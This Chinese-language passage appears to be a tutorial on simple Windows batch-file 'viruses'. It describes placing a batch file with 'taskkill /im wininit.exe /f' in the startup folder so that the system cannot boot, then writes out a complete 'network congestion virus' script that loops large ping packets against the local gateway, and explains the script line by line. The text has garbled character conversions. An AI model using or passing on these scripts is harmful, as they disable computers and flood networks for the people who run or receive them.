批处理文件:批处理文件(.bat)是一种简单的脚本文件,包含一系列命令,按顺序实行。 任务管理器命令:taskkill /im wininit.exe /f 是 Windows 任务管理器的命令,用于强制结束指定进程。/im 参数指定进程名称,/f 参数表示强制结束。 启动文件夹:Windows 的启动文件夹包含在系统启动时自动运行的步伐和脚本。将批处理文件放置在这里,会导致每次系统启动时自动实行该批处理文件中的命令。 危害 系统不稳定:wininit.exe 是 Windows 初始化进程,负责启动系统的基本服务和驱动步伐。强制结束这个进程会导致系统无法正常启动,甚至可能导致系统崩溃。 数据丢失:由于系统无法正常启动,可能会导致未保存的数据丢失。 安全风险:这种行为通常与恶意软件相关,可能会被用来隐藏其他恶意操纵,如偷取数据、安装后门等。
网络堵塞病毒
原理:使用ping命令大量向网关发包
@echo off
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| findstr /i "IPv4"') do set "ip=%%a"
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| findstr /i "Default Gateway"') do set "gateway=%%a"
:ping_loop
ping -l 65500 -n 100 %gateway% >nul
goto ping_loop
复制代码
@echo off 作用:关闭命令行窗口中命令的回显。通常环境下,在命令提示符中实行命令时, 会显示每条命令自己以及实在行结果(如果有)。使用 @echo off 后,只会 显示命令实行产生的结果(如果结果未被重定向隐藏),而不会显示具体执 行的命令内容,如许可以使命令行窗口输出更加简洁,专注于步伐运行的实质效果。 获取ipv4地址的循环部门
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| findstr /i "IPv4"') do set "ip=%%a"